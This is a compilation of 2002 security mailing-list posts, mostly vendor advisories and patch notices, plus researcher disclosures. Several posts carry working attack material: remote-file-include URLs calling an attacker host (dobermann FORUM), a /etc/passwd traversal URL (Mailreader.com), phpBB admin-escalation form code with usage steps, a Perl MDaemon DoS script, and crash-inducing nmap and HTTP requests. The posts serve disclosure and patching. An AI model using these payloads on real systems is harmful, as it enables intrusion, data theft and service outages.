Security Update: [CSSA-2002-040.0] Linux: uudecode performs inadequate checks on user-specified output files

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED] [EMAIL PROTECTED]

__

SCO Security Advisory

Subject:Linux: uudecode performs inadequate checks on user-specified 
output files
Advisory number:CSSA-2002-040.0
Issue date: 2002 October 28
Cross reference:
__


1. Problem Description

The uudecode utility would create an output file without checking
to see if it was about to write to a symlink or a pipe. If a
user uses uudecode to extract data into open shared directories,
such as /tmp, this vulnerability could be used by a local attacker
to overwrite files or lead to privilege escalation.


2. Vulnerable Supported Versions

System  Package
--

OpenLinux 3.1.1 Server  prior to sharutils-4.2.1-7MR.1.i386.rpm

OpenLinux 3.1.1 Workstation prior to sharutils-4.2.1-7MR.1.i386.rpm

OpenLinux 3.1 Serverprior to sharutils-4.2.1-7MR.1.i386.rpm

OpenLinux 3.1 Workstation   prior to sharutils-4.2.1-7MR.1.i386.rpm


3. Solution

The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-040.0/RPMS

4.2 Packages

98a9348513f981d0c919de67c7a3fd44sharutils-4.2.1-7MR.1.i386.rpm

4.3 Installation

rpm -Fvh sharutils-4.2.1-7MR.1.i386.rpm

4.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-040.0/SRPMS

4.5 Source Packages

9c89a0b5d4527def4cb2764bcd87f972sharutils-4.2.1-7MR.1.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-040.0/RPMS

5.2 Packages

d790a48715269c624d347556e4e84253sharutils-4.2.1-7MR.1.i386.rpm

5.3 Installation

rpm -Fvh sharutils-4.2.1-7MR.1.i386.rpm

5.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-040.0/SRPMS

5.5 Source Packages

521eb3dbd3aabb1e76a5db895f46e0bfsharutils-4.2.1-7MR.1.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-040.0/RPMS

6.2 Packages

87cd6250715583afa9905785853e546bsharutils-4.2.1-7MR.1.i386.rpm

6.3 Installation

rpm -Fvh sharutils-4.2.1-7MR.1.i386.rpm

6.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-040.0/SRPMS

6.5 Source Packages

ce9daba62eb424024a37b1d0288384dbsharutils-4.2.1-7MR.1.src.rpm


7. OpenLinux 3.1 Workstation

7.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-040.0/RPMS

7.2 Packages

03b5f44ec89f04f36500e9ce909459adsharutils-4.2.1-7MR.1.i386.rpm

7.3 Installation

rpm -Fvh sharutils-4.2.1-7MR.1.i386.rpm

7.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-040.0/SRPMS

7.5 Source Packages

cc2636f8152aced9d77fa310c65f0b8csharutils-4.2.1-7MR.1.src.rpm


8. References

Specific references for this advisory:
http://www.aerasec.de/security/index.html?id=ae-200204-033&lang=en
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0178
http://www.kb.cert.org/vuls/id/336083

SCO security resources:
http://www.sco.com/support/security/index.html

This security fix closes SCO incidents sr864863, fz521051,
erg712053.


9. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended
to promote secure installation and use of SCO products.


10. Acknowledgements

AERAsec discovered and researched this vulnerability.

__



msg09646/pgp0.pgp
Description: PGP signature

dobermann FORUM (php)

[Frog Man]

Informations :
°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file

PHP Code/location :
°°°
entete.php
enteteacceuil.php
topic/entete.php :
--
include $subpath."banniere.php"; ?>
--

index.php
newtopic.php :

@require "config.php";
@include("entete.php");


Exploits :
°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php

Patch :
°°°
In files :
--
entete.php
enteteacceuil.php
topic/entete.php
--
replace the line :
--
include $subpath."banniere.php"; ?>
--
by :
--

$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
@include $banfile; }
?>
--



More details in french :
http://www.frog-man.org/tutos/dobermannFORUM.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n






_
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

SCAN Associates Advisory : Multiple vurnerabilities on mailreader.com

[pokleyzz]

Products: Mailreader.com v 2.3.31 and below (http://www.mailreader.com)
Date: 28 October 2002
Author:  pokleyzz <[EMAIL PROTECTED]>
Contributors: [EMAIL PROTECTED] [EMAIL PROTECTED]

Description
===
Mailreader.com (http://www.mailreader.com) is  web base pop3 email 
reader written in perl.

Details
===
There is multiple vurnerabilities in this package as describe below.

1) Read any text file

By default mailreader install with language support.  There is no proper
error checking in configLanguage input.Using nullbyte poisoning  we can 
easily overwrite that value with any file we want and cause mailreader to 
display the file content.
ex:

http://192.168.0.1/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../..
/../../../../../etc/passwd%00

Affected version :  <=  Mailreader.com v2.3.31


2) Remote command execution

Mailreader allow user to specify their own mail server so any user can
login and use the mailreader . User also can overwrite SMTPServers 
configuration using configSMTPServers input.  For version 2.3.30 and above
there is an option to use sendmail as mail transfer agent.  There is poor 
error checking for $CONFIG{RealEmail} in compose.cgi which will use as $from in
network.cgi.

from network.cgi line 372:

	if ($server =~ /[.]*sendmail/) {
		# close the file 'cause it isn't needed
		close FILE;

		# send the file
		my $res = `$server -U -f$from -t -i < $filename`;

		# and escape
		return 1;
	}

This will allow user to include value that will escape to shell and run 
arbitrary command as web user.

Affected version : Mailreader.com v2.3.30 and Mailreader.com v2.3.31

Vendor Response 
=== 
Vendor has been contacted on 23/10/2002 and new version of Mailreader.com  
is available.

[SECURITY] [DSA 182-1] New kghostview packages fix buffer overflow

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 182-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 28th, 2002  http://www.debian.org/security/faq
- --

Package: kdegraphics
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2002-0838
BugTraq ID : 5808

Zen-parse discovered a buffer overflow in gv, a PostScript and PDF
viewer for X11.  The same code is present in kghostview which is part
of the KDE-Graphics package.  This problem is triggered by scanning
the PostScript file and can be exploited by an attacker sending a
malformed PostScript or PDF file.  The attacker is able to cause
arbitrary code to be run with the privileges of the victim.

This problem has been fixed in version 2.2.2-6.8 for the current
stable distribution (woody) and in version 2.2.2-6.9 for the unstable
distribution (sid).  The old stable distribution (potato) is not
affected since no KDE is included.

We recommend that you upgrade your kghostview package.

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.dsc
  Size/MD5 checksum:  978 92a3fa3751c538608857c57a713a9487

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.diff.gz
  Size/MD5 checksum:59276 fe7f3a7ed39f52457efca69226bccc33

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2.orig.tar.gz
  Size/MD5 checksum:  1640320 4dc8538c4c8dd8b13ef4f8e62446d777

  Alpha architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_alpha.deb
  Size/MD5 checksum:   165978 fba04ef31acd55249d3df119b6712444

  ARM architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_arm.deb
  Size/MD5 checksum:   146588 b76885389c6d29dbd11db488385b395f

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_i386.deb
  Size/MD5 checksum:   146264 e574c2d69f9392ce94a9a03d1297a218

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_ia64.deb
  Size/MD5 checksum:   197724 9a35cfc75c5672a0ddba1c17a9d9d62e

  HP Precision architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_hppa.deb
  Size/MD5 checksum:   171188 0c683f2d0f8f667c93ded25dde41332f

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_m68k.deb
  Size/MD5 checksum:   142828 68fa4e43a0af7a2d024c55da219b99ad

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mips.deb
  Size/MD5 checksum:   138378 842a9be4b081394452ec550cc564d0b7

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mipsel.deb
  Size/MD5 checksum:   136866 d884fae95437379052339da29ccc5afd

  PowerPC architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_powerpc.deb
  Size/MD5 checksum:   146622 fbf4c9b3164b0a0f3329df556ec722be

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_s390.deb
  Size/MD5 checksum:   146122 eea9e2c0f0bb23303ee0e29e95a6e3e4

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_sparc.deb
  Size/MD5 checksum:   148240 62902f062d14a4c6a6794d1368be49d4


  Please note that the source packages mentioned above produce more
  binary packages than the ones listed above.  They are not relevant
  for the fixed problems, though.

  These files will probably be moved into the stable distribution on
  its next revision.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.

Privilege Escalation Vulnerability In phpBB 2.0.0

[nick84]

Privilege Escalation Vulnerability In phpBB 2.0.0
-

Rootsecure.net recently found a privilege escalation vulnerability 
in "phpBB 2.0.0" which allows any person with a "user" level account to 
escalate their privileges to that of "administrator" level, and therefore 
gain full unrestrictive control of a forum.

A coding error exists in the admin_ug_auth.php script (used to set 
permissions), which means that although admin rights are needed to view 
the page, anyone can post data back to it "no questions asked".  
Therefore, if you already know what kind of response the board is looking 
for, you can go straight ahead and tell it directly that you want to give 
admin rights to a specific account.

Demonstration Code
--






http://www.domain_name/board_directory/admin/admin_ug_auth.php";>
User Level: 
Administrator
User




User Number: 






Before using the sample code you must first find out two bits of 
information:

1. The base directory of the board, (usually something like 
http://www.mydomain.com/phpBB2), which is found by taking off index.php 
from the main page URL.
2. The user number of the account you wish to give admin.  To do this go 
to the forums member list page, click your username, then note down the 
number shown at the right end of the URL you are now at.  (if no users 
have been deleted from the board, then the number next to your username 
on the members list page under the "#" column will also be your true user 
number).

When you have all the information, ensure you log out from the board.  
(otherwise, you will get a permissions error later on).

Now edit the form action in the demonstration code above to be the full 
location of the boards base directory plus the location of the admin 
script.  Usually, this is in a subdirectory from the base directory 
called /admin/.  Your result should look something like this: 
action=http://www.domain_name/board_directory/admin/admin_ug_auth.php.  
Save the changes to your page when you are done.  

Next just call it in a local browser window, typing the user number you 
obtained into the user number box on screen, and hit submit.  On your 
next login, you will have admin rights.

Note: phpBB versions above 2.0.0 are not vulnerable.

Additional information along with downloadable versions of the exploit 
code in the form of a static HTML page, and Perl script can be found at 
http://www.rootsecure.net?menuitem=exploit_code

__
http://www.rootsecure.net/

GLSA: ypserv

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200210-010
- - 

PACKAGE : ypserv
SUMMARY : information leak
DATE    : 2002-10-28 14:10 UTC
EXPLOIT : remote

- - 

Thorsten Kukuck discovered a problem in the ypserv program which is
part of the Network Information Services (NIS).  A memory leak in all
versions of ypserv prior to 2.5 is remotely exploitable.  When a
malicious user could request a non-existing map the server will leak
parts of an old domainname and mapname.

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-nds/ypserv-1.3.12 and earlier update their systems as follows:

emerge rsync
emerge ypserv
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9vUUjfT7nyhUpoZMRAv7wAJ4hQ2QqPozFTcLkIr3ddJCHwIqiOQCcC89e
CW28lSsCnFemMc4lTReoiao=
=IWUR
-END PGP SIGNATURE-

CISCO as5350 crashes with nmap connect scan

[Thomas Munn]

I have managed to "reduplicate" at least five times the
following scenario with a cisco as5250, with firmwrare
12.2 (11t) release firmware of cisco:

nmap -dinsane -p 1-65535 ip.of.as5350 This causes a
"hard" lockup, and the device must be powered off in
order to have functionality restored to it.

Mentioned to PSIRT at cisco, they didn't do anything.

Sincerely,

Thomas J. Munn

MDaemon SMTP/POP/IMAP server DoS

[D4rkGr3y]

##
#Product: MDaemon SMTP/POP/IMAP server   #
#Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
#Vulnerable versions: v.6.0.7 and bellow #
#Vulnerability: buffer overflow  #
#Bug&exploit by D4rkGr3y [www.dhgroup.org]   #
##

#Overview#--#
>From MDaemon's help file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs of
any number of individual users and comes complete with a powerful set
of integrated tools for managing mail accounts and message formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

#Problem##
Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
sending long arguments (32b and above) with DELE or UIDL commands.
To do this u must have at least mail-account on vulnerable host.
After geting long request from client, all MDaemon's Services will be
closed (smtp, imap, pop, (?)worldclient).
Here the log of attack on local MDaemon POP-server:

+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK [EMAIL PROTECTED]'s mailbox has 1 total messages (18356 octets).
UIDL 

Connection to host lost...

#Exploit##

#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", 
Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);

#EOF

Best regards   www.dhgroup.org
  D4rkGr3yicq 540981

GLSA: krb5

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200210-011
- - 

PACKAGE : krb5
SUMMARY : buffer overflow
DATE    : 2002-10-28 14:10 UTC
EXPLOIT : remote

- - 

A stack buffer overflow in the implementation of the Kerberos v4
compatibility administration daemon (kadmind4) in the MIT krb5
distribution can be exploited to gain unauthorized root access to a
KDC host.  The attacker does not need to authenticate to the daemon to
successfully perform this attack.  At least one exploit is known to
exist in the wild, and at least one attacker is reasonably competent
at cleaning up traces of intrusion.

Read the full advisory at
http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm4.txt

SOLUTION

It is recommended that all Gentoo Linux users who are running
app-crypt/krb5 and earlier update their systems as follows:

emerge rsync
emerge krb5
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9vUr1fT7nyhUpoZMRAhvRAJ9zxSpTuroJ57RA9lVFegHfCODgkgCbBGRb
4qBVkt0y6Ndn9pVFt0zrplo=
=SacS
-END PGP SIGNATURE-

Re: Privilege Escalation Vulnerability In phpBB 2.0.0

[x x]

Hi,

> Note: phpBB versions above 2.0.0 are not vulnerable.

Note that there are alot of modified/hacked versions
of phpbb floating around the Net, such as the 
phpbbtonuke port for phpnuke.  The phpbb port for
phpnuke55 and 56 uses phpbb2.0, and there is no patch
or available port upgrade.

As a workaround solution, you can restrict access to
the admin directory by using Apache htaccess basic 
auth (see mod_access, mod_auth, htpasswd). Might want 
to do this anyway even if you do upgrade to a more
recent phpbb package (layered security is a good 
thing).

Regards,
kw

P.S.  Don't bother replying to the disposable
hellokitty998877 email account.  Send replies to
ken . williams at ey . com

__
Do you Yahoo!?
Y! Web Hosting - Let the expert host your web site
http://webhosting.yahoo.com/

Oracle9iAS Web Cache Denial of Service (a102802-1)

[@stake advisories]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


   @stake, Inc.
 www.atstake.com

Security Advisory


Advisory Name: Oracle9iAS Web Cache Denial of Service
 Release Date: 10-28-2002
  Application: Oracle9iAS Web Cache 9.0.2.0.0
 Platform: Windows NT/2000/XP
 Severity: Remote anonymous DoS
   Author: Andreas Junestam ([EMAIL PROTECTED])
Vendor Status: Oracle has released a bulletin
CVE Candidate: CAN-2002-0386 
Reference: www.atstake.com/research/advisories/2002/a102802-1.txt


Overview:

Oracle Web Cache is a part of the Oracle Application Server suite. The
Web Cache server is designed to be implemented in front of the Oracle
Web server and act as a caching reverse proxy server.

There exists two different denial of service scenarios, which will cause
the Web Cache service to fail. The denial of service conditions can be
exploited by simple HTTP requests to the Web Cache service.


Detailed Description:

There exists two different denial of service situations in Oracle Web
Cache 9.0.2.0.0. The first one is triggered by issuing a HTTP GET
request containing at least one dot-dot-slash contained in the URI:

GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]

The second denial of service is triggered by issuing an malformed GET
request:

GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF]

Both will create an exception and the service will fail.


Vendor Response:

Vendor was first contacted by @stake: 08-28-2002.
Vendor released a bulletin: 10-04-2002

Oracle has released a bulletin describing a solution to this issue.


Recommendation:

Follow the vendor's instructions detailed in the security bulletin for
this issue. 

- - From the Oracle bulletin:

  Customers should follow best security practices for protecting the
  administration process from unauthorized users and requests. As such,
  Oracle strongly encourages customers to take both of the following
  protective measures:
  1. Use firewall techniques to restrict access to the Web Cache
 administration port.
  2. Use the “Secure Subnets” feature of the Web Cache Manager tool to
 provide access only to administrators connecting from a list of
 permitted IP addresses or subnets.
  The potential security vulnerability is being tracked internally at
  Oracle and will be fixed by default in the 9.0.4 release of Oracle9i
  Application Server.

  For more information, see:
  http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf


Common Vulnerabilities and Exposures (CVE) Information:

CAN-2002-0386 Oracle9iAS Web Cache Denial of Service


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2002 @stake, Inc. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 7.0.3 for non-commercial use 

iQA/AwUBPb2J9Ee9kNIfAm4yEQLSFQCg7dL0gNKF5XxKlGK6KMXPKqd8ngEAnj1Q
nqWXYFAipK5RbSYzYmRAgoP+
=5sSn
-END PGP SIGNATURE-

Substitution of document signed under new American format ECDSA.

[Alexander Komlin]

Introduction.

Contemporary world is practically impossible without systems of electronic digital 
signature (EDS). 
Every Internet user imperceptibly for himself uses them. It is these methods which 
ensure 
functionality and efficiency of contemporary banking sector. Despite this fact the EDS 
standards 
themselves are very young and are at the stage of perfection. One of the most 
perspective 
standards is ANSI X.9-62 ECDSA of 1999 - DSA for elliptic curves. In the process of 
adaptation all 
peculiarities of the operations with the elliptic curves were not taken into account 
to full extent 
and it gave an opportunity to imitate substitution of the signed document.
One of the main requirements to the methods of digital signature is the impossibility 
to find within 
reasonable period of time two or more documents corresponding one signature (or vice 
versa). In 
addition to the EDS mechanism the procedure of hashing is used (in DSA it is SHA-1) 
which results 
in assigning to each document very large and unpredictable number (hereinafter 
referred to as 
hash) which is signed.
The majority of the attacks is aimed at this procedure in order to find method of 
receiving 
documents with identical hashes (or hashes which differ at given value).
This work uses slightly different approach: there is made an attempt by modification 
of the keys 
chosen by the user to find such meanings of the signature so that they match two 
previously 
determined hash values. It was determined that it can be done by ordinary user of EDS 
scheme, if 
he specially chooses value for his keys: private key and per- message secret. In this 
case the user 
does not need to modify domain parameters of EDS. For the purpose of clearness below 
is given an 
illustration of the substitution of signature for approved NIST sets of parameter of 
federal use.

I suppose that there is no need to comment legal consequences of the existence of 
common 
signature for two documents. 

Description of the mistake

Mathematical apparatus of the latest American standard of electronic digital signature 
know as 
ECDSA (DSA for elliptic curves) [1 page 25-30] contains grave mistake which makes it 
possible to 
choose value of secrete code in order to get identical signatures for various 
documents. The 
described mistake differs from the already known, having similar consequences DSKS 
(Duplicate 
Signature Key Selection) [1, page 30-32] as it does not require participation of the 
criminal in 
selection of signature parameters (G,n etc). Thus it is available for almost any EDS 
user and not 
only to EDS software engineers. 

The description retains symbols adopted in the standard.

The mistake is caused by the equality of x-coordinates of the opposite points of the 
elliptic curve
_x(G)= =_x(-G). (1)

It is easy to see that from nG=0 follows that (n-1)G=-G (2)

Thus
rl = _x(kG)= = r2=-x( (n-l)kG)= = r (3)

where k - per-message secret of the signature for the purpose of simplicity taken for 
1.

The development of formula for k>1 is analogous.

Let we need to select identical signature for messages M1 and M2 ( or rather for their 
hashes e1 
and e2). We can calculate such private key d that signatures for these messages will 
be identical.
Let k1 = 1, k2 =n-1, then r1 = r2=r_x(G) (3a)

Lets take a closer look at the formula of the signature:
S: = k'(e+dr)(mod n)
s1=k1'(e1+dr) mod n (4a,b)
s2=k2'(e2+dr) mod n (4 a,b)

where
k1'*k1 mod n = 1; k1' = 1
k2'*(n-k1) mod n = 1; k2'= n-1

e1 = SHA(M1); e2=SHA(M2)

This implies that s2=s1=s if
(e1+dr) = = (n-1)*(e2+dr) (mod n) (5)
2dr = (n-1)(e2+e1) (mod n) (5b)

>From here it is easy to find d:
d = z'(n-1)(e2+e1) mod n (6)

where
z'*(2r) mod n = = 1 mod n

Thus we get absolutely identical signatures (s, r) for various messages. 
---

It is not difficult to correct this mistake. It is only necessary to provide for 
demonstrative 
generation of d.

For example, random variable Seed0 is chosen.
Private key d : = SHA-1(Seed0)
Both values are retained.
It is impossible to select desirable value d in this scheme.
Of course, the time of key generation will increase, but it is not critical in the 
majority of cases.

There is one more option: to send as signature not (s,r) but rather (s, R) where R=kG.

Sincerely yours,
A.V. Komlin, Russia

Detailed description of ECDSA standard and known attacks at it is given in the book 
The Elliptic Curve Digital Signature Algorithm (ECDSA)
Don Johnson (Gerticom Research), Alfred Menezes (University of Waterloo) February 24, 
2000.
The book is available in PDF format at http://rook.unic.ru/pdf/ecdsa.zip.
--

The mentioned below page contains Java-applet allowing to calculate within several 
seconds in the 
interactive mode identical signatures and required keys for any two different messages 
in five 
standar

Re: Buffer overflow in kadmind4

[Chris Barnes]

Hi!

About the KTH Heimdal remote root exploit I can say it is really serious!

About a week ago a hacker stole over 10'000 passwords from Stockholm University in 
Sweden for all students and staff by trapping the stack buffer overflow in kadmind4. 
You can imagine what problems this caused and what this will cost.

As we at our place have learned it is important to protect the KDC server by a 
firewall to not allow the rest of the world to reach it. Since this happened a week 
ago exploits for this are floating around.

Also we've heard people talking after examining the Heimdal code more carefully that 
there is a few more parts in it which needs to be rewritten. So if you
run a KDC, please protect it carefully! There will probably be new realeases of 
Heimdal out in a week or so.

Please upgrade your systems ASAP becase this is a really serios problem!

--Chris
-- 

Powered by Outblaze

[SNS Advisory No.57] AN HTTPD Cross-site Scripting Vulnerability

[[EMAIL PROTECTED]]

--
SNS Advisory No.57
AN HTTPD Cross-site Scripting Vulnerability

Problem first discovered: Wed, 23 Oct 2002
Published: Mon, 28 Oct 2002
Reference: http://www.lac.co.jp/security/english/snsadv_e/57_e.html
--

Overview:
-
  AN HTTPD 1.41d is prone to a Cross-site Scripting vulnerability. 

Details:

  AN HTTPD shows an error page if a client sends a request containing 
  ":" in the URI field.  The problem occurs due to the fact that this 
  URI is injected into the error page without being sanitized.

Tested Versions:

  AN HTTPD 1.41d

Tested OS:
--
  Windows 2000 Server + SP3

Solution:
-
  This problem can be eliminated by updating to AN HTTPD 1.41e.

  AN HTTPD 1.41e
  http://www.st.rim.or.jp/~nakata/httpd141e.exe

Discovered by:
--
  Keigo Yamazaki

Acknowledgements:
-
  Thanks to:
  Mr. Akio Nakata

Disclaimer:
---
  All information in these advisories are subject to change without any
  advanced notices neither mutual consensus, and each of them is released
  as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences
  caused by applying those information. 

--
SecureNet Service(SNS) Security Advisory <[EMAIL PROTECTED]>
Computer Security Laboratory, LAC  http://www.lac.co.jp/security/

GLSA: mod_ssl

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200210-009
- - 

PACKAGE : mod_ssl
SUMMARY : cross site scripting
DATE    : 2002-10-27 00:40 UTC
EXPLOIT : remote

- - 

Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 
and earlier, when UseCanonicalName is off and wildcard DNS is enabled, 
allows remote attackers to execute script as other web site visitors, 
via the server name in an HTTPS response on the SSL port, which is used 
in a self-referencing URL.

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-www/mod_ssl-2.8.11 and earlier update their systems as follows:

emerge rsync
emerge mod_ssl
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9uzVqfT7nyhUpoZMRAt2JAKC3lguQrRSwDKcDdtUL4042aHwWKACdHblk
UEB8oAlG58KkmP0LXt2YJ1I=
=E/JR
-END PGP SIGNATURE-